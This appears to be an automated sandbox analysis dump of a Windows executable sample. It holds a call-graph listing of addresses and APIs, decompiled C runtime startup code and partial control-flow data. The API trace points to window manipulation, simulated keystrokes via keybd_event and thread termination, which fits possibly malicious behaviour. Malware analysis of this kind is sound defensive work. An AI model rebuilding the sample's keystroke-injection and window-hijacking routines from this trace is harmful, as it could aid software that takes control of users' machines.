9393c7 7249->7251 7253 9393e8 7250->7253 7254 9393de 7250->7254 7252 9342fc __cftoe2_l 58 API calls 7251->7252 7255 9393cc 7252->7255 7257 93a437 __fptostr 58 API calls 7253->7257 7256 9342fc __cftoe2_l 58 API calls 7254->7256 7258 93428d __cftoe2_l 9 API calls 7255->7258 7256->7255 7259 939428 7257->7259 7263 9393d3 7258->7263 7261 93923d __cftoe2_l 58 API calls 7259->7261 7259->7263 7260 93161c __setmbcp_nolock 6 API calls 7262 939458 7260->7262 7261->7263 7262->7184 7263->7260 7265 93a5d8 ___dtold 7264->7265 7292 93a84d 7265->7292 7268 934b92 __cftoe2_l 58 API calls 7269 93a613 7268->7269 7270 93a630 7269->7270 7271 93a61a 7269->7271 7272 93429d __invoke_watson 8 API calls 7270->7272 7273 93161c __setmbcp_nolock 6 API calls 7271->7273 7275 93a63c 7272->7275 7274 939576 7273->7274 7274->7196 7274->7197 7277 93a449 7276->7277 7278 93a45f 7276->7278 7279 9342fc __cftoe2_l 58 API calls 7277->7279 7278->7277 7281 93a465 7278->7281 7280 93a44e 7279->7280 7282 93428d __cftoe2_l 9 API calls 7280->7282 7283 9342fc __cftoe2_l 58 API calls 7281->7283 7284 93a458 _memmove _strlen 7281->7284 7282->7284 7283->7280 7284->7206 7286 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7285->7286 7287 939479 7286->7287 7288 9342fc __cftoe2_l 58 API calls 7287->7288 7291 939495 _memset __shift 7287->7291 7289 93948b 7288->7289 7290 93428d __cftoe2_l 9 API calls 7289->7290 7290->7291 7291->7208 7294 93a8a2 7292->7294 7293 93a914 7296 934b92 __cftoe2_l 58 API calls 7293->7296 7294->7293 7298 93a92d 7294->7298 7304 93a8b4 7294->7304 7295 93161c __setmbcp_nolock 6 API calls 7297 93a5f3 7295->7297 7296->7304 7297->7268 7300 934b92 __cftoe2_l 58 API calls 7298->7300 7299 93b1e9 7301 93429d __invoke_watson 8 API calls 7299->7301 7300->7304 7302 93b220 7301->7302 7303 93a8c5 7303->7295 7304->7299 7304->7303 7306 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7305->7306 7307 939250 7306->7307 7308 93925d 7307->7308 7309 939266 7307->7309 7310 9342fc __cftoe2_l 58 API calls 7308->7310 7312 93927b 7309->7312 7315 93928f __shift 7309->7315 7311 939262 7310->7311 7314 93428d __cftoe2_l 9 API calls 7311->7314 7313 9342fc __cftoe2_l 58 API calls 7312->7313 7313->7311 7318 93928a _memmove 7314->7318 7316 934b92 __cftoe2_l 58 API calls 7315->7316 7317 939306 7316->7317 7317->7318 7319 93429d __invoke_watson 8 API calls 7317->7319 7318->7226 7320 93938d 7319->7320 7321 93a5af __fltout2 58 API calls 7320->7321 7322 9393c0 7321->7322 7323 9393d7 7322->7323 7324 9393c7 7322->7324 7326 9393e8 7323->7326 7327 9393de 7323->7327 7325 9342fc __cftoe2_l 58 API calls 7324->7325 7328 9393cc 7325->7328 7330 93a437 __fptostr 58 API calls 7326->7330 7329 9342fc __cftoe2_l 58 API calls 7327->7329 7331 93428d __cftoe2_l 9 API calls 7328->7331 7329->7328 7332 939428 7330->7332 7333 9393d3 7331->7333 7332->7333 7335 93923d __cftoe2_l 58 API calls 7332->7335 7334 93161c __setmbcp_nolock 6 API calls 7333->7334 7336 939458 7334->7336 7335->7333 7336->7226 7338 93938e __cftoe_l 58 API calls 7337->7338 7339 939238 7338->7339 7339->7246 7340 932d1c IsProcessorFeaturePresent 7341 932d42 7340->7341 7799 9315c2 7800 9315d1 7799->7800 7801 9315d7 7799->7801 7803 931e47 _raise 58 API calls 7800->7803 7804 9315dc __initptd 7801->7804 7805 931da5 7801->7805 7803->7801 7806 931efe _doexit 58 API calls 7805->7806 7807 931db0 7806->7807 7807->7804 7808 9312c6 7809 9312d2 7808->7809 7810 93d9b8 6 API calls 7809->7810 7811 9312d7 7810->7811 7812 9366c4 7814 9366d0 __initptd 7812->7814 7813 936707 __initptd 7814->7813 7815 9333ce __lock 58 API calls 7814->7815 7816 9366e4 7815->7816 7817 93396d __updatetlocinfoEx_nolock 58 API calls 7816->7817 7818 9366f4 7817->7818 7820 93670d 7818->7820 7823 933538 LeaveCriticalSection 7820->7823 7822 936714 7822->7813 7823->7822 7342 93d388 7344 93d390 7342->7344 7343 93c750 LoadLibraryA GetProcAddress 7343->7344 7344->7343 7345 93d4d7 7344->7345 7346 93d4fd DestroyWindow 7345->7346 7357 93d509 7345->7357 7346->7345 7347 93d70e 7348 93161c __setmbcp_nolock 6 API calls 7347->7348 7349 93d736 7348->7349 7350 93d57c CreateThread 7350->7357 7351 93d59c Sleep 7351->7357 7352 93d5af CreateWindowExW 7354 93d5f6 GetWindowLongW SetWindowLongW 7352->7354 7355 93d688 DestroyWindow DestroyWindow TerminateThread WaitForSingleObject 7352->7355 7353 93d6dd DestroyWindow DestroyWindow TerminateThread 7353->7357 7356 9310c5 7354->7356 7355->7357 7358 93d650 keybd_event keybd_event keybd_event keybd_event Sleep 7356->7358 7357->7347 7357->7350 7357->7351 7357->7352 7357->7353 7359 93c820 15 API calls 7357->7359 7358->7355 7359->7357 7824 9397f3 7827 939804 7824->7827 7828 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7827->7828 7829 939816 7828->7829 7836 939c81 7829->7836 7831 939822 7832 939836 7831->7832 7841 939b13 7831->7841 7834 939c81 __forcdecpt_l 65 API calls 7832->7834 7835 939800 7834->7835 7837 939c9f 7836->7837 7838 939c8d 7836->7838 7846 939b3e 7837->7846 7838->7831 7842 939b30 7841->7842 7843 939b1f 7841->7843 7865 939ac1 7842->7865 7843->7831 7847 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7846->7847 7848 939b51 7847->7848 7849 939bbd 7848->7849 7850 939b5d 7848->7850 7851 939bdb 7849->7851 7853 93750c __isleadbyte_l 58 API calls 7849->7853 7852 939b72 7850->7852 7858 93a79c 7850->7858 7854 9342fc __cftoe2_l 58 API calls 7851->7854 7856 939be1 7851->7856 7852->7831 7853->7851 7854->7856 7857 9358e9 ___crtLCMapStringA 62 API calls 7856->7857 7857->7852 7859 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7858->7859 7860 93a7ae 7859->7860 7861 93a7bb 7860->7861 7862 93750c __isleadbyte_l 58 API calls 7860->7862 7861->7852 7863 93a7df 7862->7863 7864 935a45 ___crtGetStringTypeA 61 API calls 7863->7864 7864->7861 7866 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7865->7866 7867 939ad2 7866->7867 7868 939ae9 7867->7868 7869 93a79c __isctype_l 61 API calls 7867->7869 7868->7831 7869->7868 7366 9349b2 7367 9349bf 7366->7367 7368 933585 __calloc_crt 58 API calls 7367->7368 7369 9349d9 7368->7369 7370 9349f2 7369->7370 7371 933585 __calloc_crt 58 API calls 7369->7371 7371->7370 7870 9364f0 RtlUnwind 7871 9348f0 7872 934902 7871->7872 7874 934910 @_EH4_CallFilterFunc@8 7871->7874 7873 93161c __setmbcp_nolock 6 API calls 7872->7873 7873->7874 7875 93b970 CreateWindowExW 7876 93ba2a 7875->7876 7877 93b9b9 7875->7877 7884 93bfe0 GetForegroundWindow 7877->7884 7880 93ba23 7881 93b9f0 7882 93ba00 TranslateMessage DispatchMessageW GetMessageW 7881->7882 7882->7882 7883 93ba1c 7882->7883 7885 93b9c5 Sleep GetMessageW 7884->7885 7886 93bff8 SystemParametersInfoW 7884->7886 7885->7880 7885->7881 7887 93c01b 7886->7887 7888 93c03e SendMessageW SendMessageW 7886->7888 7887->7888 7890 93c022 SystemParametersInfoW 7887->7890 7888->7885 7889 93c066 SystemParametersInfoW 7888->7889 7889->7885 7890->7888 7891 93c970 CreateWindowExW 7892 93ca2a 7891->7892 7893 93c9b9 7891->7893 7900 93d050 GetForegroundWindow 7893->7900 7896 93ca23 7897 93c9f0 7898 93ca00 TranslateMessage DispatchMessageW GetMessageW 7897->7898 7898->7898 7899 93ca1c 7898->7899 7901 93d068 SystemParametersInfoW 7900->7901 7906 93c9c5 Sleep GetMessageW 7900->7906 7902 93d08b 7901->7902 7903 93d0ae SendMessageW SendMessageW SetFocus SetForegroundWindow 7901->7903 7902->7903 7904 93d092 SystemParametersInfoW 7902->7904 7905 93d0e4 SystemParametersInfoW 7903->7905 7903->7906 7904->7903 7905->7906 7906->7896 7906->7897 7372 93d538 7384 93d540 7372->7384 7373 93d70e 7375 93161c __setmbcp_nolock 6 API calls 7373->7375 7374 93d57c CreateThread 7374->7384 7377 93d736 7375->7377 7376 93d59c Sleep 7376->7384 7378 93d5af CreateWindowExW 7380 93d5f6 GetWindowLongW SetWindowLongW 7378->7380 7381 93d688 DestroyWindow DestroyWindow TerminateThread WaitForSingleObject 7378->7381 7379 93d6dd DestroyWindow DestroyWindow TerminateThread 7379->7384 7382 9310c5 7380->7382 7381->7384 7383 93d650 keybd_event keybd_event keybd_event keybd_event Sleep 7382->7383 7383->7381 7384->7373 7384->7374 7384->7376 7384->7378 7384->7379 7385 93c820 15 API calls 7384->7385 7385->7384 7386 9378bf 7387 9378d5 7386->7387 7388 9378c9 7386->7388 7388->7387 7389 9378ce CloseHandle 7388->7389 7389->7387 7390 931a3d 7392 931a49 __initptd 7390->7392 7391 931a62 7395 93354d _free 58 API calls 7391->7395 7399 931a71 7391->7399 7392->7391 7393 931b51 __initptd 7392->7393 7394 93354d _free 58 API calls 7392->7394 7394->7391 7395->7399 7396 93354d _free 58 API calls 7398 931a80 7396->7398 7397 931a8f 7401 931a9e 7397->7401 7402 93354d _free 58 API calls 7397->7402 7398->7397 7400 93354d _free 58 API calls 7398->7400 7399->7396 7399->7398 7400->7397 7403 931aad 7401->7403 7405 93354d _free 58 API calls 7401->7405 7402->7401 7404 931abc 7403->7404 7406 93354d _free 58 API calls 7403->7406 7407 931ace 7404->7407 7408 93354d _free 58 API calls 7404->7408 7405->7403 7406->7404 7409 9333ce __lock 58 API calls 7407->7409 7408->7407 7413 931ad6 7409->7413 7410 931af9 7422 931b5d 7410->7422 7413->7410 7415 93354d _free 58 API calls 7413->7415 7414 9333ce __lock 58 API calls 7420 931b0d ___removelocaleref 7414->7420 7415->7410 7416 931b3e 7425 931b69 7416->7425 7419 93354d _free 58 API calls 7419->7393 7420->7416 7421 9336f3 ___freetlocinfo 58 API calls 7420->7421 7421->7416 7428 933538 LeaveCriticalSection 7422->7428 7424 931b06 7424->7414 7429 933538 LeaveCriticalSection 7425->7429 7427 931b4b 7427->7419 7428->7424 7429->7427 7430 93d23c 7431 93d1c5 7430->7431 7432 93d271 DestroyWindow 7431->7432 7433 93d280 7432->7433 7443 93d70e 7432->7443 7434 93d29a RegisterClassExW 7433->7434 7433->7443 7438 93d321 _memset 7434->7438 7434->7443 7435 93161c __setmbcp_nolock 6 API calls 7436 93d736 7435->7436 7437 93d340 CreateWindowExW 7437->7438 7441 93d37e 7437->7441 7438->7437 7438->7441 7439 93d4d7 7442 93d4fd DestroyWindow 7439->7442 7451 93d509 7439->7451 7440 93c750 LoadLibraryA GetProcAddress 7440->7441 7441->7439 7441->7440 7442->7439 7443->7435 7444 93d57c CreateThread 7444->7451 7445 93d59c Sleep 7445->7451 7446 93d5af CreateWindowExW 7448 93d5f6 GetWindowLongW SetWindowLongW 7446->7448 7449 93d688 DestroyWindow DestroyWindow TerminateThread WaitForSingleObject 7446->7449 7447 93d6dd DestroyWindow DestroyWindow TerminateThread 7447->7451 7450 9310c5 7448->7450 7449->7451 7452 93d650 keybd_event keybd_event keybd_event keybd_event Sleep 7450->7452 7451->7443 7451->7444 7451->7445 7451->7446 7451->7447 7453 93c820 15 API calls 7451->7453 7452->7449 7453->7451 7907 93d960 DefWindowProcW 7454 934a25 7461 9363f6 7454->7461 7457 934a38 7459 93354d _free 58 API calls 7457->7459 7460 934a43 7459->7460 7474 9363ff 7461->7474 7463 934a2a 7463->7457 7464 936627 7463->7464 7465 936633 __initptd 7464->7465 7466 9333ce __lock 58 API calls 7465->7466 7467 93663f 7466->7467 7468 9366a4 7467->7468 7472 936678 DeleteCriticalSection 7467->7472 7502 9372bd 7467->7502 7515 9366bb 7468->7515 7470 9366b0 __initptd 7470->7457 7473 93354d _free 58 API calls 7472->7473 7473->7467 7475 93640b __initptd 7474->7475 7476 9333ce __lock 58 API calls 7475->7476 7482 93641a 7476->7482 7477 9364b8 7492 9364da 7477->7492 7480 9364c4 __initptd 7480->7463 7482->7477 7483 93634c 82 API calls __fflush_nolock 7482->7483 7484 934a8b 7482->7484 7489 9364a7 7482->7489 7483->7482 7485 934a96 7484->7485 7486 934aac EnterCriticalSection 7484->7486 7487 9333ce __lock 58 API calls 7485->7487 7486->7482 7488 934a9f 7487->7488 7488->7482 7495 934af5 7489->7495 7491 9364b5 7491->7482 7501 933538 LeaveCriticalSection 7492->7501 7494 9364e1 7494->7480 7496 934b03 7495->7496 7497 934b16 LeaveCriticalSection 7495->7497 7500 933538 LeaveCriticalSection 7496->7500 7497->7491 7499 934b13 7499->7491 7500->7499 7501->7494 7503 9372c9 __initptd 7502->7503 7504 9372f5 7503->7504 7505 9372dd 7503->7505 7511 9372ed __initptd 7504->7511 7518 934a4c 7504->7518 7506 9342fc __cftoe2_l 58 API calls 7505->7506 7508 9372e2 7506->7508 7510 93428d __cftoe2_l 9 API calls 7508->7510 7510->7511 7511->7467 7770 933538 LeaveCriticalSection 7515->7770 7517 9366c2 7517->7470 7519 934a7e EnterCriticalSection 7518->7519 7520 934a5c 7518->7520 7522 934a74 7519->7522 7520->7519 7521 934a64 7520->7521 7523 9333ce __lock 58 API calls 7521->7523 7524 937251 7522->7524 7523->7522 7525 937260 7524->7525 7526 937274 7524->7526 7527 9342fc __cftoe2_l 58 API calls 7525->7527 7528 937270 7526->7528 7543 936392 7526->7543 7529 937265 7527->7529 7540 93732c 7528->7540 7531 93428d __cftoe2_l 9 API calls 7529->7531 7531->7528 7536 93728e 7560 93771a 7536->7560 7538 937294 7538->7528 7539 93354d _free 58 API calls 7538->7539 7539->7528 7763 934abb 7540->7763 7542 937332 7542->7511 7544 9363a5 7543->7544 7548 9363c9 7543->7548 7545 9362d4 __flush 58 API calls 7544->7545 7544->7548 7546 9363c2 7545->7546 7586 9368fd 7546->7586 7549 93788f 7548->7549 7550 93789c 7549->7550 7552 937288 7549->7552 7551 93354d _free 58 API calls 7550->7551 7550->7552 7551->7552 7553 9362d4 7552->7553 7554 9362f3 7553->7554 7555 9362de 7553->7555 7554->7536 7556 9342fc __cftoe2_l 58 API calls 7555->7556 7557 9362e3 7556->7557 7558 93428d __cftoe2_l 9 API calls 7557->7558 7559 9362ee 7558->7559 7559->7536 7561 937726 __initptd 7560->7561 7562 937733 7561->7562 7563 93774a 7561->7563 7564 9342c8 __close 58 API calls 7562->7564 7565 9377d5 7563->7565 7567 93775a 7563->7567 7566 937738 7564->7566 7568 9342c8 __close 58 API calls 7565->7568 7569 9342fc __cftoe2_l 58 API calls 7566->7569 7570 937782 7567->7570 7571 937778 7567->7571 7572 93777d 7568->7572 7582 93773f __initptd 7569->7582 7573 93736b ___lock_fhandle 59 API calls 7570->7573 7574 9342c8 __close 58 API calls 7571->7574 7575 9342fc __cftoe2_l 58 API calls 7572->7575 7576 937788 7573->7576 7574->7572 7577 9377e1 7575->7577 7578 9377a6 7576->7578 7579 93779b 7576->7579 7580 93428d __cftoe2_l 9 API calls 7577->7580 7583 9342fc __cftoe2_l 58 API calls 7578->7583 7735 9377f5 7579->7735 7580->7582 7582->7538 7584 9377a1 7583->7584 7750 9377cd 7584->7750 7587 936909 __initptd 7586->7587 7588 936916 7587->7588 7589 93692d 7587->7589 7614 9342c8 7588->7614 7591 9369cc 7589->7591 7593 936941 7589->7593 7594 9342c8 __close 58 API calls 7591->7594 7596 936969 7593->7596 7597 93695f 7593->7597 7598 936964 7594->7598 7595 9342fc __cftoe2_l 58 API calls 7606 936922 __initptd 7595->7606 7617 93736b 7596->7617 7599 9342c8 __close 58 API calls 7597->7599 7602 9342fc __cftoe2_l 58 API calls 7598->7602 7599->7598 7601 93696f 7603 936982 7601->7603 7604 936995 7601->7604 7605 9369d8 7602->7605 7626 9369ec 7603->7626 7607 9342fc __cftoe2_l 58 API calls 7604->7607 7609 93428d __cftoe2_l 9 API calls 7605->7609 7606->7548 7610 93699a 7607->7610 7609->7606 7612 9342c8 __close 58 API calls 7610->7612 7611 93698e 7685 9369c4 7611->7685 7612->7611 7615 931b8a __getptd_noexit 58 API calls 7614->7615 7616 9342cd 7615->7616 7616->7595 7618 937377 __initptd 7617->7618 7619 9373c6 EnterCriticalSection 7618->7619 7621 9333ce __lock 58 API calls 7618->7621 7620 9373ec __initptd 7619->7620 7620->7601 7622 93739c 7621->7622 7623 9373b4 7622->7623 7625 93308e ___lock_fhandle InitializeCriticalSectionAndSpinCount 7622->7625 7688 9373f0 7623->7688 7625->7623 7627 9369f9 __write_nolock 7626->7627 7628 936a57 7627->7628 7629 936a38 7627->7629 7656 936a2d 7627->7656 7633 936aaf 7628->7633 7634 936a93 7628->7634 7631 9342c8 __close 58 API calls 7629->7631 7630 93161c __setmbcp_nolock 6 API calls 7635 93724d 7630->7635 7632 936a3d 7631->7632 7636 9342fc __cftoe2_l 58 API calls 7632->7636 7637 936ac8 7633->7637 7692 937557 7633->7692 7638 9342c8 __close 58 API calls 7634->7638 7635->7611 7639 936a44 7636->7639 7701 9362f8 7637->7701 7642 936a98 7638->7642 7643 93428d __cftoe2_l 9 API calls 7639->7643 7645 9342fc __cftoe2_l 58 API calls 7642->7645 7643->7656 7644 936ad6 7646 936e2f 7644->7646 7651 931b72 __setmbcp 58 API calls 7644->7651 7647 936a9f 7645->7647 7648 9371c2 WriteFile 7646->7648 7649 936e4d 7646->7649 7650 93428d __cftoe2_l 9 API calls 7647->7650 7652 936e22 GetLastError 7648->7652 7655 936def 7648->7655 7653 936f71 7649->7653 7658 936e63 7649->7658 7650->7656 7654 936b02 GetConsoleMode 7651->7654 7652->7655 7670 936f7c 7653->7670 7678 937066 7653->7678 7654->7646 7657 936b41 7654->7657 7655->7656 7663 9371fb 7655->7663 7664 936f4f 7655->7664 7656->7630 7657->7646 7660 936b51 GetConsoleCP 7657->7660 7658->7655 7661 936ed2 WriteFile 7658->7661 7658->7663 7659 9342fc __cftoe2_l 58 API calls 7662 937229 7659->7662 7660->7663 7683 936b80 7660->7683 7661->7652 7661->7658 7666 9342c8 __close 58 API calls 7662->7666 7663->7656 7663->7659 7667 9371f2 7664->7667 7668 936f5a 7664->7668 7665 936fe1 WriteFile 7665->7652 7665->7670 7666->7656 7713 9342db 7667->7713 7671 9342fc __cftoe2_l 58 API calls 7668->7671 7669 9370db WideCharToMultiByte 7669->7652 7669->7678 7670->7655 7670->7663 7670->7665 7674 936f5f 7671->7674 7673 93712a WriteFile 7676 93717d GetLastError 7673->7676 7673->7678 7677 9342c8 __close 58 API calls 7674->7677 7676->7678 7677->7656 7678->7655 7678->7663 7678->7669 7678->7673 7679 9376bf 60 API calls __write_nolock 7679->7683 7680 936c69 WideCharToMultiByte 7680->7655 7681 936ca4 WriteFile 7680->7681 7681->7652 7681->7683 7682 9376d7 WriteConsoleW CreateFileW __putwch_nolock 7682->7683 7683->7652 7683->7655 7683->7679 7683->7680 7683->7682 7684 936cfe WriteFile 7683->7684 7710 937546 7683->7710 7684->7652 7684->7683 7734 9374e6 LeaveCriticalSection 7685->7734 7687 9369ca 7687->7606 7691 933538 LeaveCriticalSection 7688->7691 7690 9373f7 7690->7619 7691->7690 7718 93747f 7692->7718 7694 937567 7695 937580 SetFilePointerEx 7694->7695 7696 93756f 7694->7696 7698 937598 GetLastError 7695->7698 7699 937574 7695->7699 7697 9342fc __cftoe2_l 58 API calls 7696->7697 7697->7699 7700 9342db __dosmaperr 58 API calls 7698->7700 7699->7637 7700->7699 7702 936303 7701->7702 7703 936310 7701->7703 7704 9342fc __cftoe2_l 58 API calls 7702->7704 7705 93631c 7703->7705 7706 9342fc __cftoe2_l 58 API calls 7703->7706 7707 936308 7704->7707 7705->7644 7708 93633d 7706->7708 7707->7644 7709 93428d __cftoe2_l 9 API calls 7708->7709 7709->7707 7731 93750c 7710->7731 7714 9342c8 __close 58 API calls 7713->7714 7715 9342e4 __dosmaperr 7714->7715 7716 9342fc __cftoe2_l 58 API calls 7715->7716 7717 9342f7 7716->7717 7717->7656 7719 93748a 7718->7719 7720 93749f 7718->7720 7721 9342c8 __close 58 API calls 7719->7721 7722 9342c8 __close 58 API calls 7720->7722 7724 9374c4 7720->7724 7723 93748f 7721->7723 7725 9374ce 7722->7725 7726 9342fc __cftoe2_l 58 API calls 7723->7726 7724->7694 7727 9342fc __cftoe2_l 58 API calls 7725->7727 7728 937497 7726->7728 7729 9374d6 7727->7729 7728->7694 7730 93428d __cftoe2_l 9 API calls 7729->7730 7730->7728 7732 9339d6 _LocaleUpdate::_LocaleUpdate 58 API calls 7731->7732 7733 93751d 7732->7733 7733->7683 7734->7687 7736 93747f __commit 58 API calls 7735->7736 7738 937803 7736->7738 7737 937859 7753 9373f9 7737->7753 7738->7737 7740 93747f __commit 58 API calls 7738->7740 7749 937837 7738->7749 7743 93782e 7740->7743 7741 93747f __commit 58 API calls 7744 937843 CloseHandle 7741->7744 7746 93747f __commit 58 API calls 7743->7746 7744->7737 7747 93784f GetLastError 7744->7747 7745 9342db __dosmaperr 58 API calls 7748 937883 7745->7748 7746->7749 7747->7737 7748->7584 7749->7737 7749->7741 7762 9374e6 LeaveCriticalSection 7750->7762 7752 9377d3 7752->7582 7754 937465 7753->7754 7755 937405 7753->7755 7756 9342fc __cftoe2_l 58 API calls 7754->7756 7755->7754 7761 93742e 7755->7761 7757 93746a 7756->7757 7758 9342c8 __close 58 API calls 7757->7758 7759 937456 7758->7759 7759->7745 7759->7748 7760 937450 SetStdHandle 7760->7759 7761->7759 7761->7760 7762->7752 7764 934aca 7763->7764 7765 934ae9 LeaveCriticalSection 7763->7765 7764->7765 7766 934ad1 7764->7766 7765->7542 7769 933538 LeaveCriticalSection 7766->7769 7768 934ae6 7768->7542 7769->7768 7770->7517 7908 932fef 7909 932ff2 7908->7909 7910 935008 _abort 62 API calls 7909->7910 7911 932ffe 7910->7911 7771 9315ae 7774 9318e2 7771->7774 7775 931b8a __getptd_noexit 58 API calls 7774->7775 7776 9315bf 7775->7776

                      Executed Functions

                      Function 00931497 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 86COMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 90%
                      			E00931497(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				void* _t19;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t25;
				signed int _t36;
				void* _t46;
				void* _t50;
				void* _t54;

				_t48 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_push(0x14);
				_push(0x941e70);
				E009329F0(__ebx, __edi, __esi);
				E00932834(1);
				_t54 =  *0x930000 - 0x5a4d; // 0x5a4d
				if(_t54 == 0) {
					_t15 =  *0x93003c; // 0xf8
					__eflags =  *((intOrPtr*)(_t15 + 0x930000)) - 0x4550;
					if( *((intOrPtr*)(_t15 + 0x930000)) != 0x4550) {
						goto L1;
					} else {
						__eflags =  *((intOrPtr*)(_t15 + 0x930018)) - 0x10b;
						if( *((intOrPtr*)(_t15 + 0x930018)) != 0x10b) {
							goto L1;
						} else {
							_t36 = 0;
							__eflags =  *((intOrPtr*)(_t15 + 0x930074)) - 0xe;
							if( *((intOrPtr*)(_t15 + 0x930074)) > 0xe) {
								__eflags =  *(_t15 + 0x9300e8);
								_t6 =  *(_t15 + 0x9300e8) != 0;
								__eflags = _t6;
								_t36 = 0 | _t6;
							}
						}
					}
				} else {
					L1:
					_t36 = 0;
				}
				 *(_t50 - 0x1c) = _t36;
				_t16 = E00932041();
				_t55 = _t16;
				if(_t16 == 0) {
					E009315EB(0x1c);
				}
				_t17 = E00931CAC(_t36, _t47, _t55);
				_t56 = _t17;
				if(_t17 == 0) {
					_t17 = E009315EB(0x10);
				}
				E0093291D(_t17);
				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
				_t19 = E00932056(_t36, _t47, _t48, _t56); // executed
				if(_t19 < 0) {
					E009315EB(0x1b);
				}
				 *0x9591c0 = GetCommandLineA();
				 *0x957260 = E0093295D(_t46);
				_t22 = E0093230A();
				_t58 = _t22;
				if(_t22 < 0) {
					E00931D89(_t36, _t46, _t47, _t48, _t58, 8);
				}
				_t23 = E00932539(_t36, _t46, _t47, _t48);
				_t59 = _t23;
				if(_t23 < 0) {
					E00931D89(_t36, _t46, _t47, _t48, _t59, 9);
				}
				_t24 = E00931DC3(1);
				_t60 = _t24;
				if(_t24 != 0) {
					E00931D89(_t36, _t46, _t47, _t48, _t60, _t24);
				}
				_t25 =  *0x957278; // 0x1462a8
				 *0x957298 = _t25;
				_push(_t25);
				_push( *0x957270);
				_push( *0x95726c);
				E009313F5();
				_t49 = _t25;
				 *((intOrPtr*)(_t50 - 0x24)) = _t25;
				if(_t36 == 0) {
					E0093202D(_t49);
				}
				E00931DB4();
				 *(_t50 - 4) = 0xfffffffe;
				return E00932A35(_t49);
			}















                      0x00931497
                      0x00931497
                      0x00931497
                      0x00931497
                      0x00931499
                      0x0093149e
                      0x009314a5
                      0x009314b0
                      0x009314b7
                      0x009314bd
                      0x009314c2
                      0x009314cc
                      0x00000000
                      0x009314ce
                      0x009314d3
                      0x009314da
                      0x00000000
                      0x009314dc
                      0x009314dc
                      0x009314de
                      0x009314e5
                      0x009314e7
                      0x009314ed
                      0x009314ed
                      0x009314ed
                      0x009314ed
                      0x009314e5
                      0x009314da
                      0x009314b9
                      0x009314b9
                      0x009314b9
                      0x009314b9
                      0x009314f0
                      0x009314f3
                      0x009314f8
                      0x009314fa
                      0x009314fe
                      0x00931503
                      0x00931504
                      0x00931509
                      0x0093150b
                      0x0093150f
                      0x00931514
                      0x00931515
                      0x0093151a
                      0x0093151e
                      0x00931525
                      0x00931529
                      0x0093152e
                      0x00931535
                      0x0093153f
                      0x00931544
                      0x00931549
                      0x0093154b
                      0x0093154f
                      0x00931554
                      0x00931555
                      0x0093155a
                      0x0093155c
                      0x00931560
                      0x00931565
                      0x00931568
                      0x0093156e
                      0x00931570
                      0x00931573
                      0x00931578
                      0x00931579
                      0x0093157e
                      0x00931583
                      0x00931584
                      0x0093158a
                      0x00931590
                      0x00931598
                      0x0093159a
                      0x0093159f
                      0x009315a2
                      0x009315a2
                      0x009315a7
                      0x009315dc
                      0x009315ea

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__setargv__setenvp
                      • String ID: .$
                      • API String ID: 3919536372-2223841709
                      • Opcode ID: 447e92271375a9df1e2013866e30e85f0f24eb8dff11c132a35ea82408139404
                      • Instruction ID: ecf23839919412c23104172202239e24774b77e216e11c91aa7e08427df8307b
                      • Opcode Fuzzy Hash: 447e92271375a9df1e2013866e30e85f0f24eb8dff11c132a35ea82408139404
                      • Instruction Fuzzy Hash: 9A21C470A043019AEB157BF1BD56B6D32A8AFD0715F10416AF5168A1F2EB748A80DF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0093C090 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 301registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 230 93c090-93c0aa 231 93c0b0-93c0b7 230->231 232 93c4c6-93c4d5 call 93161c 230->232 231->232 234 93c0bd-93c13f RegisterClassExW 231->234 235 93c152-93c16a call 935a90 234->235 236 93c141-93c151 call 93161c 234->236 242 93c170-93c1a3 CreateWindowExW 235->242 243 93c1a5-93c1ac 242->243 244 93c1ae-93c1b8 242->244 243->242 243->244 245 93c1c0-93c1cf 244->245 246 93c1d0-93c1f0 call 93c750 * 2 245->246 251 93c202-93c205 246->251 252 93c1f2-93c200 246->252 254 93c271-93c278 251->254 255 93c207-93c20d 251->255 252->251 253 93c20f-93c26b call 93c750 * 2 252->253 253->254 257 93c283-93c292 254->257 258 93c27a-93c281 254->258 255->246 257->245 260 93c298-93c29e 257->260 258->257 258->260 262 93c2a0-93c2ad 260->262 264 93c2ba-93c2c1 262->264 265 93c2af-93c2b5 262->265 264->262 267 93c2c3-93c2ca 264->267 265->264 266 93c2b7-93c2b8 DestroyWindow 265->266 266->264 268 93c4b3-93c4c5 call 93161c 267->268 269 93c2d0-93c2d7 267->269 269->268 270 93c2dd-93c2e4 269->270 272 93c384-93c399 call 93161c 270->272 273 93c2ea 270->273 275 93c2f0-93c2fb 273->275 275->272 277 93c301-93c326 275->277 